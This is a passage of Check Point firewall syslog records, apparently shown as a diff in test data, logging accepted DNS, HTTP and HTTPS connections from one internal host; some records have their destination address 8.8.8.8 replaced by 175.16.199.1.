service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3da,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"209.87.209.101"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35138"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:59:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3db,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501147"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44471"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:59:07Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3db,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501147"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44471"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58894"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58896"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"72.246.28.170"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58892"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41652"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41652"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.168.232"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"57792"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43073"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53863"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:59:08Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dc,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501148"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43073"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53863"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"194.29.39.47"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"33728"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37359"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37359"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47294"; service:"80"; service_id:"http"; src:"192.168.2.2"] -<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37077"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37077"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"209.87.209.101"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35152"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38905"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38905"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"209.87.209.101"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35154"; service:"443"; 
service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:09Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3dd,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"209.87.209.101"; log_delay:"1585501149"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35156"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44839"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44839"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.35"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"49550"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"172.217.17.110"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42270"; service:"443"; service_id:"https"; src:"192.168.2.2"] 
<134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"209.87.209.101"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35162"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501150"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38362"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:59:10Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d3de,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & 
